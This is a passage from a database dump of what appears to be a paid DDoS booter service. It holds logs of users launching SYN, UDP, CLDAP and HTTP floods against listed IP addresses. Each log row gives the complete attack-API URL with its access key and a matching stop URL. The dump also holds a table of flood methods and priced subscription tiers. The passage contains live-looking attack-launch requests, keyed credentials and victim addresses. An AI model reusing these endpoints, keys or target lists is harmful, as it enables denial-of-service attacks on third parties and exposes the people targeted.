.19/sasa.php?&key=gumstresser666&host=[host]&port=[port]&time=[time]&method=[method]&user=test',1533687337),(79,'sasa971','46.238.185.105',80,0,'HAVEN','api',0,'http://185.157.247.19/sasa.php?&key=gumstresser666&host=46.238.185.105&port=80&time=60&method=HAVEN&user=test','http://185.157.247.19/stop.php?&key=gumstresser666&host=[host]&port=[port]&time=[time]&method=[method]&user=test',1533687915),(80,'sasa971','46.238.185.105',80,0,'HAVEN','api',0,'http://185.157.247.19/sasa.php?&key=gumstresser666&host=46.238.185.105&port=80&time=60&method=HAVEN&user=test','http://185.157.247.19/sasa.php?&key=gumstresser666&host=[host]&port=[port]&time=[time]&method=[STOP]&user=testhod=STOP',1533688161),(81,'sasa971','http://195.20.4',80,0,'G-HTTP','api',0,'http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=http://195.20.48.212/&port=80&time=60&method=G-HTTP','http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=[host]&port=[port]&time=[time]&method=STOP',1533688651),(82,'kuky14lf','54.208.29.23',443,0,'SYN','api',0,'http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=54.208.29.23&port=443&time=600&method=SYN','http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=[host]&port=[port]&time=[time]&method=STOP',1533692288),(83,'kuky14lf','34.200.133.238',443,0,'SYN','api',0,'http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=34.200.133.238&port=443&time=600&method=SYN','http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=[host]&port=[port]&time=[time]&method=STOP',1533692497),(84,'kuky14lf','34.195.130.140',443,0,'SYN','api',0,'http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=34.195.130.140&port=443&time=600&method=SYN','http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=[host]&port=[port]&time=[time]&method=STOP',1533692846),(85,'kuky14lf','34.195.130.140',443,600,'SYN','api',0,'http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=34.195.130.140&port=443&time=600&method=SYN','http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=[host]&port=[port]&time=[time]&method=STOP',1533692959),(86,'kuky14lf','34.195.130.140',443,0,'SYN','api',0,'http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=34.195.130.140&port=443&time=600&method=SYN','http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=[host]&port=[port]&time=[time]&method=STOP',1533693802),(87,'kuky14lf','54.208.29.23',443,600,'SYN','api',0,'http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=54.208.29.23&port=443&time=600&method=SYN','http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=[host]&port=[port]&time=[time]&method=STOP',1533693902),(88,'kuky14lf','34.195.130.140',443,0,'HAVEN','api',0,'http://185.157.247.19/sasa.php?&key=gumstresser666&host=34.195.130.140&port=443&time=600&method=HAVEN&user=test','http://185.157.247.19/sasa.php?&key=gumstresser666&host=[host]&port=[port]&time=[time]&method=[STOP]&user=testhod=STOP',1533699716),(89,'kuky14lf','34.195.130.140',443,600,'UDPLAG','api',0,'http://185.157.247.19/sasa.php?&key=gumstresser666&host=34.195.130.140&port=443&time=600&method=UDPLAG&user=test','http://185.157.247.19/sasa.php?&key=gumstresser666&host=[host]&port=[port]&time=[time]&method=[STOP]&user=testhod=STOP',1533699771),(90,'kuky14lf','52.6.81.48',443,600,'SYN','api',0,'http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=52.6.81.48&port=443&time=600&method=SYN','http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=[host]&port=[port]&time=[time]&method=STOP',1533707116),(91,'kuky14lf','54.85.163.110',443,0,'SYN','api',0,'http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=54.85.163.110&port=443&time=600&method=SYN','http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=[host]&port=[port]&time=[time]&method=STOP',1533711616),(92,'kuky14lf','54.86.29.115',443,0,'SYN','api',0,'http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=54.86.29.115&port=443&time=600&method=SYN','http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=[host]&port=[port]&time=[time]&method=STOP',1533711971),(93,'sasa971','92.89.40.112',80,7200,'HAVEN','api',0,'http://185.157.247.19/sasa.php?&key=gumstresser666&host=92.89.40.112&port=80&time=7200&method=HAVEN&user=test','http://185.157.247.19/sasa.php?&key=gumstresser666&host=[host]&port=[port]&time=[time]&method=[STOP]&user=testhod=STOP',1533732022),(94,'sasa971','194.169.211.46',80,0,'CLDAP','api',0,'http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=194.169.211.46&port=80&time=60&method=CLDAP','http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=[host]&port=[port]&time=[time]&method=STOP',1533748052),(95,'sasa971','194.169.211.46',80,0,'SYN','api',0,'http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=194.169.211.46&port=80&time=60&method=SYN','http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=[host]&port=[port]&time=[time]&method=STOP',1533748079),(96,'Achlyys','176.160.62.157',80,0,'HAVEN','api',0,'http://185.157.247.19/sasa.php?&key=gumstresser666&host=176.160.62.157&port=80&time=2300&method=HAVEN&user=test','http://185.157.247.19/sasa.php?&key=gumstresser666&host=[host]&port=[port]&time=[time]&method=[STOP]&user=testhod=STOP',1533748507),(97,'Blinderrr','82.242.140.22',80,300,'UDPLAG','api',0,'http://185.157.247.19/sasa.php?&key=gumstresser666&host=82.242.140.22&port=80&time=300&method=UDPLAG&user=test','http://185.157.247.19/sasa.php?&key=gumstresser666&host=[host]&port=[port]&time=[time]&method=[STOP]&user=testhod=STOP',1533749233),(98,'Achlyys','108.171.80.209',80,0,'HAVEN','api',0,'http://185.157.247.19/sasa.php?&key=gumstresser666&host=108.171.80.209&port=80&time=2300&method=HAVEN&user=test','http://185.157.247.19/sasa.php?&key=gumstresser666&host=[host]&port=[port]&time=[time]&method=[STOP]&user=testhod=STOP',1533750559),(99,'Achlyys','108.171.80.209',80,2300,'ACK','api',0,'http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=108.171.80.209&port=80&time=2300&method=ACK','http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=[host]&port=[port]&time=[time]&method=STOP',1533750594),(100,'Blinderrr','82.242.140.22',80,300,'UDPLAG','api',0,'http://185.157.247.19/sasa.php?&key=gumstresser666&host=82.242.140.22&port=80&time=300&method=UDPLAG&user=test','http://185.157.247.19/sasa.php?&key=gumstresser666&host=[host]&port=[port]&time=[time]&method=[STOP]&user=testhod=STOP',1533752268),(101,'Blinderrr','90.54.225.167',80,300,'UDPLAG','api',0,'http://185.157.247.19/sasa.php?&key=gumstresser666&host=90.54.225.167&port=80&time=300&method=UDPLAG&user=test','http://185.157.247.19/sasa.php?&key=gumstresser666&host=[host]&port=[port]&time=[time]&method=[STOP]&user=testhod=STOP',1533753151),(102,'Blinderrr','90.54.225.167',80,0,'UDPLAG','api',0,'http://185.157.247.19/sasa.php?&key=gumstresser666&host=90.54.225.167&port=80&time=300&method=UDPLAG&user=test','http://185.157.247.19/sasa.php?&key=gumstresser666&host=[host]&port=[port]&time=[time]&method=[STOP]&user=testhod=STOP',1533753846),(103,'Blinderrr','90.54.225.167',80,0,'UDPLAG','api',0,'http://185.157.247.19/sasa.php?&key=gumstresser666&host=90.54.225.167&port=80&time=300&method=UDPLAG&user=test','http://185.157.247.19/sasa.php?&key=gumstresser666&host=[host]&port=[port]&time=[time]&method=[STOP]&user=testhod=STOP',1533755661),(104,'Blinderrr','90.54.225.167',80,300,'UDPLAG','api',0,'http://185.157.247.19/sasa.php?&key=gumstresser666&host=90.54.225.167&port=80&time=300&method=UDPLAG&user=test','http://185.157.247.19/sasa.php?&key=gumstresser666&host=[host]&port=[port]&time=[time]&method=[STOP]&user=testhod=STOP',1533756484),(105,'Blinderrr','82.242.140.22',80,300,'UDPLAG','api',0,'http://185.157.247.19/sasa.php?&key=gumstresser666&host=82.242.140.22&port=80&time=300&method=UDPLAG&user=test','http://185.157.247.19/sasa.php?&key=gumstresser666&host=[host]&port=[port]&time=[time]&method=[STOP]&user=testhod=STOP',1533757818),(106,'Achlyys','90.113.219.241',80,0,'HAVEN','api',0,'http://185.157.247.19/sasa.php?&key=gumstresser666&host=90.113.219.241&port=80&time=2300&method=HAVEN&user=test','http://185.157.247.19/sasa.php?&key=gumstresser666&host=[host]&port=[port]&time=[time]&method=[STOP]&user=testhod=STOP',1533758717),(107,'Blinderrr','82.242.140.22',80,300,'UDPLAG','api',0,'http://185.157.247.19/sasa.php?&key=gumstresser666&host=82.242.140.22&port=80&time=300&method=UDPLAG&user=test','http://185.157.247.19/sasa.php?&key=gumstresser666&host=[host]&port=[port]&time=[time]&method=[STOP]&user=testhod=STOP',1533758780),(108,'Blinderrr','82.242.140.22',80,300,'UDPLAG','api',0,'http://185.157.247.19/sasa.php?&key=gumstresser666&host=82.242.140.22&port=80&time=300&method=UDPLAG&user=test','http://185.157.247.19/sasa.php?&key=gumstresser666&host=[host]&port=[port]&time=[time]&method=[STOP]&user=testhod=STOP',1533760065),(109,'Blinderrr','82.242.140.22',80,300,'UDPLAG','api',0,'http://185.157.247.19/sasa.php?&key=gumstresser666&host=82.242.140.22&port=80&time=300&method=UDPLAG&user=test','http://185.157.247.19/sasa.php?&key=gumstresser666&host=[host]&port=[port]&time=[time]&method=[STOP]&user=testhod=STOP',1533761638),(110,'Blinderrr','90.54.225.167',80,300,'UDPLAG','api',0,'http://185.157.247.19/sasa.php?&key=gumstresser666&host=90.54.225.167&port=80&time=300&method=UDPLAG&user=test','http://185.157.247.19/sasa.php?&key=gumstresser666&host=[host]&port=[port]&time=[time]&method=[STOP]&user=testhod=STOP',1533763958),(111,'Achlyys','92.89.40.112',80,0,'HAVEN','api',0,'http://185.157.247.19/sasa.php?&key=gumstresser666&host=92.89.40.112&port=80&time=2300&method=HAVEN&user=test','http://185.157.247.19/sasa.php?&key=gumstresser666&host=[host]&port=[port]&time=[time]&method=[STOP]&user=testhod=STOP',1533765029),(112,'Blinderrr','90.54.225.167',80,300,'UDPLAG','api',0,'http://185.157.247.19/sasa.php?&key=gumstresser666&host=90.54.225.167&port=80&time=300&method=UDPLAG&user=test','http://185.157.247.19/sasa.php?&key=gumstresser666&host=[host]&port=[port]&time=[time]&method=[STOP]&user=testhod=STOP',1533767824),(113,'K1NGARU','41.251.32.210',80,300,'HAVEN','api',0,'http://185.157.247.19/sasa.php?&key=gumstresser666&host=41.251.32.210&port=80&time=300&method=HAVEN&user=test','http://185.157.247.19/sasa.php?&key=gumstresser666&host=[host]&port=[port]&time=[time]&method=[STOP]&user=testhod=STOP',1533767985),(114,'Achlyys','82.228.207.11',80,2300,'HAVEN','api',0,'http://185.157.247.19/sasa.php?&key=gumstresser666&host=82.228.207.11&port=80&time=2300&method=HAVEN&user=test','http://185.157.247.19/sasa.php?&key=gumstresser666&host=[host]&port=[port]&time=[time]&method=[STOP]&user=testhod=STOP',1533820016),(115,'Achlyys','82.228.73.240',80,0,'HAVEN','api',0,'http://185.157.247.19/sasa.php?&key=gumstresser666&host=82.228.73.240&port=80&time=2300&method=HAVEN&user=test','http://185.157.247.19/sasa.php?&key=gumstresser666&host=[host]&port=[port]&time=[time]&method=[STOP]&user=testhod=STOP',1533823777),(116,'Achlyys','87.231.186.227',80,0,'HAVEN','api',0,'http://185.157.247.19/sasa.php?&key=gumstresser666&host=87.231.186.227&port=80&time=2300&method=HAVEN&user=test','http://185.157.247.19/sasa.php?&key=gumstresser666&host=[host]&port=[port]&time=[time]&method=[STOP]&user=testhod=STOP',1533824900),(117,'Achlyys','90.113.219.241',80,2300,'HAVEN','api',0,'http://185.157.247.19/sasa.php?&key=gumstresser666&host=90.113.219.241&port=80&time=2300&method=HAVEN&user=test','http://185.157.247.19/sasa.php?&key=gumstresser666&host=[host]&port=[port]&time=[time]&method=[STOP]&user=testhod=STOP',1533824969),(118,'Achlyys','108.171.80.209',80,0,'HAVEN','api',0,'http://185.157.247.19/sasa.php?&key=gumstresser666&host=108.171.80.209&port=80&time=2300&method=HAVEN&user=test','http://185.157.247.19/sasa.php?&key=gumstresser666&host=[host]&port=[port]&time=[time]&method=[STOP]&user=testhod=STOP',1533825144),(119,'Achlyys','91.69.223.119',80,0,'HAVEN','api',0,'http://185.157.247.19/sasa.php?&key=gumstresser666&host=91.69.223.119&port=80&time=2300&method=HAVEN&user=test','http://185.157.247.19/sasa.php?&key=gumstresser666&host=[host]&port=[port]&time=[time]&method=[STOP]&user=testhod=STOP',1533825291),(120,'Achlyys','84.6.20.9',80,0,'HAVEN','api',0,'http://185.157.247.19/sasa.php?&key=gumstresser666&host=84.6.20.9&port=80&time=2300&method=HAVEN&user=test','http://185.157.247.19/sasa.php?&key=gumstresser666&host=[host]&port=[port]&time=[time]&method=[STOP]&user=testhod=STOP',1533825395),(121,'Achlyys','88.121.150.111',80,0,'HAVEN','api',0,'http://185.157.247.19/sasa.php?&key=gumstresser666&host=88.121.150.111&port=80&time=2300&method=HAVEN&user=test','http://185.157.247.19/sasa.php?&key=gumstresser666&host=[host]&port=[port]&time=[time]&method=[STOP]&user=testhod=STOP',1533825631),(122,'Achlyys','90.104.42.194 ',80,2300,'HAVEN','api',0,'http://185.157.247.19/sasa.php?&key=gumstresser666&host=90.104.42.194 &port=80&time=2300&method=HAVEN&user=test','http://185.157.247.19/sasa.php?&key=gumstresser666&host=[host]&port=[port]&time=[time]&method=[STOP]&user=testhod=STOP',1533826384),(123,'K1NGARU','109.222.72.97',80,60,'HAVEN','api',0,'http://185.157.247.19/sasa.php?&key=gumstresser666&host=109.222.72.97&port=80&time=60&method=HAVEN&user=test','http://185.157.247.19/sasa.php?&key=gumstresser666&host=[host]&port=[port]&time=[time]&method=[STOP]&user=testhod=STOP',1533828562),(124,'Blinderrr','92.92.149.14',80,0,'UDPLAG','api',0,'http://185.157.247.19/sasa.php?&key=gumstresser666&host=92.92.149.14&port=80&time=300&method=UDPLAG&user=test','http://185.157.247.19/sasa.php?&key=gumstresser666&host=[host]&port=[port]&time=[time]&method=[STOP]&user=testhod=STOP',1533844533),(125,'Blinderrr','77.144.178.22',80,0,'UDPLAG','api',0,'http://185.157.247.19/sasa.php?&key=gumstresser666&host=77.144.178.22&port=80&time=300&method=UDPLAG&user=test','http://185.157.247.19/sasa.php?&key=gumstresser666&host=[host]&port=[port]&time=[time]&method=[STOP]&user=testhod=STOP',1533844704),(126,'Achlyys','90.60.23.176',80,0,'HAVEN','api',0,'http://185.157.247.19/sasa.php?&key=gumstresser666&host=90.60.23.176&port=80&time=2300&method=HAVEN&user=test','http://185.157.247.19/sasa.php?&key=gumstresser666&host=[host]&port=[port]&time=[time]&method=[STOP]&user=testhod=STOP',1533847467),(127,'Achlyys','90.60.23.176',80,0,'HAVEN','api',0,'http://185.157.247.19/sasa.php?&key=gumstresser666&host=90.60.23.176&port=80&time=2300&method=HAVEN&user=test','http://185.157.247.19/sasa.php?&key=gumstresser666&host=[host]&port=[port]&time=[time]&method=[STOP]&user=testhod=STOP',1533848140),(128,'PerquiZ','78.228.234.249',80,0,'CLDAP','api',0,'http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=78.228.234.249&port=80&time=5&method=CLDAP','http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=[host]&port=[port]&time=[time]&method=STOP',1533852259),(129,'PerquiZ','78.228.234.249',80,0,'CLDAP','api',0,'http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=78.228.234.249&port=80&time=60&method=CLDAP','http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=[host]&port=[port]&time=[time]&method=STOP',1533852611),(130,'PerquiZ',' 81.66.198.161',30,0,'CLDAP','api',0,'http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host= 81.66.198.161&port=30&time=300&method=CLDAP','http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=[host]&port=[port]&time=[time]&method=STOP',1533852849),(131,'PerquiZ','82.228.207.11',80,0,'CLDAP','api',0,'http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=82.228.207.11&port=80&time=300&method=CLDAP','http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=[host]&port=[port]&time=[time]&method=STOP',1533852884),(132,'PerquiZ','82.228.207.11',30,0,'CLDAP','api',0,'http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=82.228.207.11&port=30&time=300&method=CLDAP','http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=[host]&port=[port]&time=[time]&method=STOP',1533852953),(133,'PerquiZ','78.228.234.249',80,0,'ACK','api',0,'http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=78.228.234.249&port=80&time=40&method=ACK','http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=[host]&port=[port]&time=[time]&method=STOP',1533853295),(134,'PerquiZ','78.228.234.249',80,0,'UDPLAG','api',0,'http://185.157.247.19/sasa.php?&key=gumstresser666&host=78.228.234.249&port=80&time=40&method=UDPLAG&user=test','http://185.157.247.19/sasa.php?&key=gumstresser666&host=[host]&port=[port]&time=[time]&method=[STOP]&user=testhod=STOP',1533853393),(135,'PerquiZ',' 81.66.198.161',80,0,'CLDAP','api',0,'http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host= 81.66.198.161&port=80&time=300&method=CLDAP','http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=[host]&port=[port]&time=[time]&method=STOP',1533853500),(136,'PerquiZ','82.228.207.11',80,0,'CLDAP','api',0,'http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=82.228.207.11&port=80&time=300&method=CLDAP','http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=[host]&port=[port]&time=[time]&method=STOP',1533853531),(137,'PerquiZ','86.201.129.101',80,300,'UDPLAG','api',0,'http://185.157.247.19/sasa.php?&key=gumstresser666&host=86.201.129.101&port=80&time=300&method=UDPLAG&user=test','http://185.157.247.19/sasa.php?&key=gumstresser666&host=[host]&port=[port]&time=[time]&method=[STOP]&user=testhod=STOP',1533853667),(138,'PerquiZ','82.228.207.11',80,0,'UDPLAG','api',0,'http://185.157.247.19/sasa.php?&key=gumstresser666&host=82.228.207.11&port=80&time=60&method=UDPLAG&user=test','http://185.157.247.19/sasa.php?&key=gumstresser666&host=[host]&port=[port]&time=[time]&method=[STOP]&user=testhod=STOP',1533853775),(139,'PerquiZ','86.201.129.101',80,0,'UDPLAG','api',0,'http://185.157.247.19/sasa.php?&key=gumstresser666&host=86.201.129.101&port=80&time=300&method=UDPLAG&user=test','http://185.157.247.19/sasa.php?&key=gumstresser666&host=[host]&port=[port]&time=[time]&method=[STOP]&user=testhod=STOP',1533853867),(140,'PerquiZ','92.170.178.183',80,20,'UDPLAG','api',0,'http://185.157.247.19/sasa.php?&key=gumstresser666&host=92.170.178.183&port=80&time=20&method=UDPLAG&user=test','http://185.157.247.19/sasa.php?&key=gumstresser666&host=[host]&port=[port]&time=[time]&method=[STOP]&user=testhod=STOP',1533854014),(141,'PerquiZ','92.170.178.183',80,0,'HAVEN','api',0,'http://185.157.247.19/sasa.php?&key=gumstresser666&host=92.170.178.183&port=80&time=40&method=HAVEN&user=test','http://185.157.247.19/sasa.php?&key=gumstresser666&host=[host]&port=[port]&time=[time]&method=[STOP]&user=testhod=STOP',1533854088),(142,'K1NGARU','77.204.70.5',80,300,'HAVEN','api',0,'http://185.157.247.19/sasa.php?&key=gumstresser666&host=77.204.70.5&port=80&time=300&method=HAVEN&user=test','http://185.157.247.19/sasa.php?&key=gumstresser666&host=[host]&port=[port]&time=[time]&method=[STOP]&user=testhod=STOP',1533854119),(143,'PerquiZ','92.170.178.183',80,0,'NFO','api',0,'http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=92.170.178.183&port=80&time=60&method=NFO','http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=[host]&port=[port]&time=[time]&method=STOP',1533854123),(144,'PerquiZ','92.170.178.183',80,0,'SYN','api',0,'http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=92.170.178.183&port=80&time=300&method=SYN','http://api.undisclosed.to/api.php?key=39df9ebb827e20cc9d5b092addadab60&tool=boot&host=[host]&port=[port]&time=[time]&method=STOP',1533854193),(145,'PerquiZ',' 81.66.198.161',80,0,'UDPLAG','api',0,'http://185.157.247.19/sasa.php?&key=gumstresser666&host= 81.66.198.161&port=80&time=60&method=UDPLAG&user=test','http://185.157.247.19/sasa.php?&key=gumstresser666&host=[host]&port=[port]&time=[time]&method=[STOP]&user=testhod=STOP',1533854206),(146,'sasa971','46.238.185.104',80,0,'HAVEN','api',0,'http://185.157.247.19/sasa.php?&key=natha555&host=46.238.185.104&port=80&time=60&method=HAVEN&user=test','http://185.157.247.19/sasa.php?&key=natha555&host=[host]&port=[port]&time=[time]&method=[method]&user=test',1533859281),(147,'sasa971','46.105.183.21',80,0,'HAVEN','api',0,'http://185.157.247.19/sasa.php?&key=natha555&host=46.105.183.21&port=80&time=60&method=HAVEN&user=test','http://185.157.247.19/sasa.php?&key=natha555&host=[host]&port=[port]&time=[time]&method=[method]&user=test',1533874845),(148,'sasa971','141.0.165.204',80,0,'HAVEN','api',0,'http://185.157.247.19/sasa.php?&key=natha555&host=141.0.165.204&port=80&time=60&method=HAVEN&user=test','http://185.157.247.19/sasa.php?&key=natha555&host=[host]&port=[port]&time=[time]&method=[method]&user=test',1533874911);
83/*!40000 ALTER TABLE `attacklogs` ENABLE KEYS */;
84UNLOCK TABLES;
85
86--
87-- Table structure for table `blacklist`
88--
89
90DROP TABLE IF EXISTS `blacklist`;
91/*!40101 SET @saved_cs_client = @@character_set_client */;
92/*!40101 SET character_set_client = utf8 */;
93CREATE TABLE `blacklist` (
94 `ID` int(11) NOT NULL AUTO_INCREMENT,
95 `IP` varchar(100) NOT NULL,
96 `note` text NOT NULL,
97 PRIMARY KEY (`ID`)
98) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=latin1;
99/*!40101 SET character_set_client = @saved_cs_client */;
100
101--
102-- Dumping data for table `blacklist`
103--
104
105LOCK TABLES `blacklist` WRITE;
106/*!40000 ALTER TABLE `blacklist` DISABLE KEYS */;
107INSERT INTO `blacklist` VALUES (1,'46.238.185.103','');
108/*!40000 ALTER TABLE `blacklist` ENABLE KEYS */;
109UNLOCK TABLES;
110
111--
112-- Table structure for table `btc_payments`
113--
114
115DROP TABLE IF EXISTS `btc_payments`;
116/*!40101 SET @saved_cs_client = @@character_set_client */;
117/*!40101 SET character_set_client = utf8 */;
118CREATE TABLE `btc_payments` (
119 `id` int(11) NOT NULL AUTO_INCREMENT,
120 `amount` double NOT NULL,
121 `package` int(11) NOT NULL,
122 `userid` int(11) NOT NULL,
123 `transaction_hash` varchar(100) NOT NULL,
124 `status` int(1) NOT NULL,
125 `date` int(11) NOT NULL,
126 PRIMARY KEY (`id`)
127) ENGINE=InnoDB DEFAULT CHARSET=latin1;
128/*!40101 SET character_set_client = @saved_cs_client */;
129
130--
131-- Dumping data for table `btc_payments`
132--
133
134LOCK TABLES `btc_payments` WRITE;
135/*!40000 ALTER TABLE `btc_payments` DISABLE KEYS */;
136/*!40000 ALTER TABLE `btc_payments` ENABLE KEYS */;
137UNLOCK TABLES;
138
139--
140-- Table structure for table `commands`
141--
142
143DROP TABLE IF EXISTS `commands`;
144/*!40101 SET @saved_cs_client = @@character_set_client */;
145/*!40101 SET character_set_client = utf8 */;
146CREATE TABLE `commands` (
147 `id` int(11) NOT NULL AUTO_INCREMENT,
148 `sid` int(11) NOT NULL,
149 `command` varchar(255) NOT NULL,
150 `stopCmd` varchar(255) NOT NULL,
151 `method` varchar(30) NOT NULL,
152 PRIMARY KEY (`id`)
153) ENGINE=InnoDB DEFAULT CHARSET=latin1;
154/*!40101 SET character_set_client = @saved_cs_client */;
155
156--
157-- Dumping data for table `commands`
158--
159
160LOCK TABLES `commands` WRITE;
161/*!40000 ALTER TABLE `commands` DISABLE KEYS */;
162/*!40000 ALTER TABLE `commands` ENABLE KEYS */;
163UNLOCK TABLES;
164
165--
166-- Table structure for table `methods`
167--
168
169DROP TABLE IF EXISTS `methods`;
170/*!40101 SET @saved_cs_client = @@character_set_client */;
171/*!40101 SET character_set_client = utf8 */;
172CREATE TABLE `methods` (
173 `id` int(11) NOT NULL AUTO_INCREMENT,
174 `method` varchar(30) NOT NULL,
175 `group` varchar(50) NOT NULL,
176 `desc` varchar(255) NOT NULL,
177 PRIMARY KEY (`id`)
178) ENGINE=InnoDB AUTO_INCREMENT=10 DEFAULT CHARSET=latin1;
179/*!40101 SET character_set_client = @saved_cs_client */;
180
181--
182-- Dumping data for table `methods`
183--
184
185LOCK TABLES `methods` WRITE;
186/*!40000 ALTER TABLE `methods` DISABLE KEYS */;
187INSERT INTO `methods` VALUES (2,'HAVEN','layer4','0'),(3,'UDPLAG','layer4','0'),(4,'CLDAP','layer4','0'),(5,'NFO','layer4','0'),(6,'ACK','layer4','0'),(7,'SYN','layer4','0'),(9,'G-HTTP','layer7','0');
188/*!40000 ALTER TABLE `methods` ENABLE KEYS */;
189UNLOCK TABLES;
190
191--
192-- Table structure for table `news`
193--
194
195DROP TABLE IF EXISTS `news`;
196/*!40101 SET @saved_cs_client = @@character_set_client */;
197/*!40101 SET character_set_client = utf8 */;
198CREATE TABLE `news` (
199 `ID` int(11) NOT NULL AUTO_INCREMENT,
200 `title` varchar(50) NOT NULL,
201 `detail` text NOT NULL,
202 `date` int(11) NOT NULL,
203 PRIMARY KEY (`ID`)
204) ENGINE=MyISAM DEFAULT CHARSET=latin1;
205/*!40101 SET character_set_client = @saved_cs_client */;
206
207--
208-- Dumping data for table `news`
209--
210
211LOCK TABLES `news` WRITE;
212/*!40000 ALTER TABLE `news` DISABLE KEYS */;
213/*!40000 ALTER TABLE `news` ENABLE KEYS */;
214UNLOCK TABLES;
215
216--
217-- Table structure for table `packages`
218--
219
220DROP TABLE IF EXISTS `packages`;
221/*!40101 SET @saved_cs_client = @@character_set_client */;
222/*!40101 SET character_set_client = utf8 */;
223CREATE TABLE `packages` (
224 `id` int(11) NOT NULL AUTO_INCREMENT,
225 `name` varchar(100) NOT NULL,
226 `price` float NOT NULL,
227 `mbt` int(11) NOT NULL,
228 `unit` varchar(25) NOT NULL,
229 `length` int(11) NOT NULL,
230 `concurrents` int(11) NOT NULL,
231 `methods` varchar(255) NOT NULL,
232 `public` int(1) NOT NULL,
233 PRIMARY KEY (`id`)
234) ENGINE=InnoDB AUTO_INCREMENT=8 DEFAULT CHARSET=latin1;
235/*!40101 SET character_set_client = @saved_cs_client */;
236
237--
238-- Dumping data for table `packages`
239--
240
241LOCK TABLES `packages` WRITE;
242/*!40000 ALTER TABLE `packages` DISABLE KEYS */;
243INSERT INTO `packages` VALUES (2,'Debutant',2,300,'Months',1,1,'[\"HAVEN\",\"UDPLAG\",\"CLDAP\",\"NFO\",\"ACK\",\"SYN\"]',2),(3,'Paramecia',5,600,'Months',1,1,'[\"HAVEN\",\"UDPLAG\",\"CLDAP\",\"NFO\",\"ACK\",\"SYN\"]',2),(4,'Zoan',10,2300,'Years',1,2,'[\"HAVEN\",\"UDPLAG\",\"CLDAP\",\"NFO\",\"ACK\",\"SYN\",\"G-HTTP\"]',2),(5,'Logia',15,3500,'Months',1,3,'[\"HAVEN\",\"UDPLAG\",\"CLDAP\",\"NFO\",\"ACK\",\"SYN\",\"G-HTTP\"]',2),(6,'OWNER',100000000,2147483647,'Years',99999,10,'[\"HAVEN\",\"UDPLAG\",\"CLDAP\",\"NFO\",\"ACK\",\"SYN\",\"G-HTTP\"]',1),(7,'Staff',0,0,'',0,0,'',0);
244/*!40000 ALTER TABLE `packages` ENABLE KEYS */;
245UNLOCK TABLES;
246
247--
248-- Table structure for table `pp_payments`
249--
250
251DROP TABLE IF EXISTS `pp_payments`;
252/*!40101 SET @saved_cs_client = @@character_set_client */;
253/*!40101 SET character_set_client = utf8 */;
254CREATE TABLE `pp_payments` (
255 `ID` int(11) NOT NULL AUTO_INCREMENT,
256 `paid` float NOT NULL,
257 `plan` int(11) NOT NULL,
258 `pname` varchar(50) NOT NULL,
259 `user` int(15) NOT NULL,
260 `email` varchar(60) NOT NULL,
